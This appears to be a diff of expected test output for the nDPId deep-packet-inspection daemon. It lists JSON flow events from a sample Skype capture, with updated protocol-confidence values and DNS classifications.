-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642247,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55159,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642247,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00641{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":472,"flow_first_seen":1431969710853,"flow_last_seen":1431969807279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":133455,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":50108,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777184,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969664357,"flow_last_seen":1431969789358,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 